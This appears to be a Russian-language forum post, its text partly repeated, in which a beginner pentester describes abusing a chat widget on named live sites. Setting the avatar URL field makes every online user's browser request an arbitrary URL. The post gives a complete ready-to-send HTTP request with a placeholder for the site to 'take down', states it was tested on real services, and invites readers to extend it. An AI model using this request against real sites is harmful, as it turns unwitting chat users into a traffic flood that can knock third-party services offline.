Краткая предыстория:
Совсем недавно занялся тестированием веб приложений на проникновение, решал CTF и таски на различных платформах и впервые решил поискать что-то на реальном ресурсе.
Зайдя на один из таких ресурсов в глаза сразу бросился чат с несколькими тысячами пользователями онлайн, возникла идея найти XSS или хотя-бы научиться делать веб запросы от каждого из пользователей.
Описание уязвимости:
В запросе сразу обнаруживаем два параметра с ссылками:
Заменяем URL аватара на endpoint и получаем это:
В результате посылки каждого сообщения на ресурс аватара, выполняется количество запросов равное количеству пользователей в онлайне.
Итоговый запрос для чата на сайте https://znanija.site/ (редактируйте в зависимости от ресурса где находится чат):
Ресурсы с чатом, где тестировал:
1. https://znanija.site/
2. https://www.chatbro.com/
Я уверен, что уязвимость можно доработать дo чего-то большего, поэтому оставляю ее вам).
От вас лишь попрошу поставить лайки и написать комментарии.
Совсем недавно занялся тестированием веб приложений на проникновение, решал CTF и таски на различных платформах и впервые решил поискать что-то на реальном ресурсе.
Зайдя на один из таких ресурсов в глаза сразу бросился чат с несколькими тысячами пользователями онлайн, возникла идея найти XSS или хотя-бы научиться делать веб запросы от каждого из пользователей.
Описание уязвимости:
В запросе сразу обнаруживаем два параметра с ссылками:
Заменяем URL аватара на endpoint и получаем это:
В результате посылки каждого сообщения на ресурс аватара, выполняется количество запросов равное количеству пользователей в онлайне.
Итоговый запрос для чата на сайте https://znanija.site/ (редактируйте в зависимости от ресурса где находится чат):
POST /send_message/ HTTP/2
Host: www.chatbro.com
Content-Length: 558
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://znanija.site
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://znanija.site/
Accept-Encoding: gzip, deflate
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
{"encodedChatId":"08VQM","body":{"text":"asd","attachments":[]},"chatLanguage":"RU","siteDomain":"znanija.site","timestamp":1677915716582,"userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","mobile":false,"connType":"ws","authorChatClientId":"bf664834-db7f-431e-8576-9dd9b1ee9337","siteUserExternalId":"103411","siteUserFullName":"vqeywa","siteUserAvatarUrl":"САЙТ_КОТОРЫЙ_КЛАДЕМ","siteUserProfileUrl":"http://chatbro.com/","permissions":[],"eo":""}
Ресурсы с чатом, где тестировал:
1. https://znanija.site/
2. https://www.chatbro.com/
Я уверен, что уязвимость можно доработать дo чего-то большего, поэтому оставляю ее вам).
От вас лишь попрошу поставить лайки и написать комментарии.